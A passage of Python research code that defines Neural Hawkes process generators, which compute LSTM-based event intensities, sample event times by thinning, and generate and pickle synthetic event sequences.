'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
#
time_rep_t = self.hard_relu(
self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
)
time_rep_t = numpy.concatenate(
(
time_rep_t,
self.one_seq[-1][
'time_since_last_event'
][None]
), axis = 0
)
emb_time_t = numpy.dot(
time_rep_t, self.Emb_time
)
#
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time_scale'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'Threshold_time': numpy.copy(self.Threshold_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
#
time_rep_t = self.hard_relu(
self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
)
time_rep_t = numpy.concatenate(
(
time_rep_t,
self.one_seq[-1][
'time_since_last_event'
][None]
), axis = 0
)
emb_time_t = numpy.dot(
time_rep_t, self.Emb_time
)
#
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
'''
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale_reduce(
object
):
'''
here is the sequence generator
using Neural Hawkes process with reduced decay param
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model,
self.dim_model
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time_scale_reduce'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq) )
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'Threshold_time': numpy.copy(self.Threshold_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
#
time_rep_t = self.hard_relu(
self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
)
time_rep_t = numpy.concatenate(
(
time_rep_t,
self.one_seq[-1][
'time_since_last_event'
][None]
), axis = 0
)
emb_time_t = numpy.dot(
time_rep_t, self.Emb_time
)
#
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
time_recent = self.one_seq[-1]['time_since_start']
# W_delta : dim_model * dim_model
delta = self.soft_relu(
numpy.dot(
self.hidden_t, self.W_delta
)
)
# dim_model
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t
# dim_model
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.dot(
hidden_with_time, self.W_alpha
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.dot(
self.hidden_t, self.W_delta
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t
# hidden_with_time : dim_model
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time[:, None]
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
'''
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
